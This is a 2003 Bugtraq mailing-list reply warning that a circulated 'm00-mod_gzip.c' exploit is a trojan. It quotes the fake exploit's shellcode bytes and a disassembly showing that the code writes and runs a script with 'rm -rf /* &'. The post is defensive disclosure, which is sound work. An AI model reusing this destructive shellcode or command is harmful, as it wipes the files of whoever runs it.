Message-ID: <3FC09F70.4050605@freebsd.lublin.pl>
Date: Sun, 23 Nov 2003 12:52:16 +0100
From: Przemyslaw Frasunek <venglin@...ebsd.lublin.pl>
To: bugtraq@...urityfocus.com
Subject: Re: m00-mod_gzip.c
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
d4rkgr3y wrote:
> /* m00-mod_gzip.c
Do NOT run it: this is a fake exploit whose "shellcode" runs rm -rf / (disassembly follows):
> char default_shellcode[] =
> "\x31\xC0\x50\x68\x2F\x62\x69\x6E\x89\xE3\xB0\x0C\xCD\x80\x31\xC0\x50"
> "\x68\x7A\x7A\x7A\x7A\x89\xE3\x6A\x41\x59\xB0\x05\xCD\x80\x31\xC9\x51"
> "\x68\x2F\x2A\x20\x26\x68\x2D\x72\x66\x20\x68\x0A\x72\x6D\x20\x68\x6B"
> "\x69\x6C\x6C\x68\x20\x2D\x66\x20\x68\x68\x0A\x72\x6D\x68\x69\x6E\x2F"
> "\x73\x68\x23\x21\x2F\x62\x89\xE1\x89\xC3\xB2\x20\xB0\x04\xCD\x80\xB0"
> "\x06\xCD\x80\x31\xC0\x50\x68\x7A\x7A\x7A\x7A\x89\xE3\x66\xB9\xED\x01"
> "\xB0\x0F\xCD\x80\x31\xC0\x31\xD2\x50\x68\x7A\x7A\x7A\x7A\x68\x2E\x2F"
> "\x2F\x2F\x89\xE3\x50\x53\x89\xE1\xB0\x0B\xCD\x80\x31\xC0\x40\xCD\x80";
0x0804a5a0 <default_shellcode+0>: xor %eax,%eax
0x0804a5a2 <default_shellcode+2>: push %eax
0x0804a5a3 <default_shellcode+3>: push $0x6e69622f
0x0804a5a8 <default_shellcode+8>: mov %esp,%ebx
0x0804a5aa <default_shellcode+10>: mov $0xc,%al
0x0804a5ac <default_shellcode+12>: int $0x80 -> chdir("/bin")
0x0804a5ae <default_shellcode+14>: xor %eax,%eax
0x0804a5b0 <default_shellcode+16>: push %eax
0x0804a5b1 <default_shellcode+17>: push $0x7a7a7a7a
0x0804a5b6 <default_shellcode+22>: mov %esp,%ebx
0x0804a5b8 <default_shellcode+24>: push $0x41
0x0804a5ba <default_shellcode+26>: pop %ecx
0x0804a5bb <default_shellcode+27>: mov $0x5,%al
0x0804a5bd <default_shellcode+29>: int $0x80 -> open("zzzz", 0x41)
0x0804a5bf <default_shellcode+31>: xor %ecx,%ecx
0x0804a5c1 <default_shellcode+33>: push %ecx
0x0804a5c2 <default_shellcode+34>: push $0x26202a2f
0x0804a5c7 <default_shellcode+39>: push $0x2066722d
0x0804a5cc <default_shellcode+44>: push $0x206d720a
0x0804a5d1 <default_shellcode+49>: push $0x6c6c696b
0x0804a5d6 <default_shellcode+54>: push $0x20662d20
0x0804a5db <default_shellcode+59>: push $0x6d720a68
0x0804a5e0 <default_shellcode+64>: push $0x732f6e69
0x0804a5e5 <default_shellcode+69>: push $0x622f2123
0x0804a5ea <default_shellcode+74>: mov %esp,%ecx
0x0804a5ec <default_shellcode+76>: mov %eax,%ebx
0x0804a5ee <default_shellcode+78>: mov $0x20,%dl
0x0804a5f0 <default_shellcode+80>: mov $0x4,%al
0x0804a5f2 <default_shellcode+82>: int $0x80 -> write(fd, "#!/bin/sh
rm -f kill
rm -rf /* &", 0x20);
0x0804a5f4 <default_shellcode+84>: mov $0x6,%al
0x0804a5f6 <default_shellcode+86>: int $0x80 -> close(fd)
0x0804a5f8 <default_shellcode+88>: xor %eax,%eax
0x0804a5fa <default_shellcode+90>: push %eax
0x0804a5fb <default_shellcode+91>: push $0x7a7a7a7a
0x0804a600 <default_shellcode+96>: mov %esp,%ebx
0x0804a602 <default_shellcode+98>: mov $0x1ed,%cx
0x0804a606 <default_shellcode+102>: mov $0xf,%al
0x0804a608 <default_shellcode+104>: int $0x80 -> chmod("zzzz", 0755)
0x0804a60a <default_shellcode+106>: xor %eax,%eax
0x0804a60c <default_shellcode+108>: xor %edx,%edx
0x0804a60e <default_shellcode+110>: push %eax
0x0804a60f <default_shellcode+111>: push $0x7a7a7a7a
0x0804a614 <default_shellcode+116>: push $0x2f2f2f2e
0x0804a619 <default_shellcode+121>: mov %esp,%ebx
0x0804a61b <default_shellcode+123>: push %eax
0x0804a61c <default_shellcode+124>: push %ebx
0x0804a61d <default_shellcode+125>: mov %esp,%ecx
0x0804a61f <default_shellcode+127>: mov $0xb,%al
0x0804a621 <default_shellcode+129>: int $0x80 ->
execve("/bin/zzzz", "/bin/zzzz", 0)
0x0804a623 <default_shellcode+131>: xor %eax,%eax
0x0804a625 <default_shellcode+133>: inc %eax
0x0804a626 <default_shellcode+134>: int $0x80 -> exit()
0x0804a628 <default_shellcode+136>: add %al,(%eax)
0x0804a62a <default_shellcode+138>: add %al,(%eax)
0x0804a62c <default_shellcode+140>: add %al,(%eax)
0x0804a62e <default_shellcode+142>: add %al,(%eax)
0x0804a630 <default_shellcode+144>: add %al,(%eax)
0x0804a632 <default_shellcode+146>: add %al,(%eax)
0x0804a634 <default_shellcode+148>: add %al,(%eax)
0x0804a636 <default_shellcode+150>: add %al,(%eax)
0x0804a638 <default_shellcode+152>: add %al,(%eax)
0x0804a63a <default_shellcode+154>: add %al,(%eax)
0x0804a63c <default_shellcode+156>: add %al,(%eax)
0x0804a63e <default_shellcode+158>: add %al,(%eax)
[...]
> (long) range=default_shellcode;
> range();
[...]
- --
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NICHDL: PMF9-RIPE *
* Inet: przemyslaw@...sunek.com ** keyId: 2578FCAD ** HAM-RADIO: SQ8JIV *
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
iD8DBQE/wJ9vkxEnBiV4/K0RAldLAKDam66ZCmIiqoGUn3eqpp25ucyVXgCgvSRS
9bc6c5pGkgncYeToNPsZeeM=
=jxIK
-----END PGP SIGNATURE-----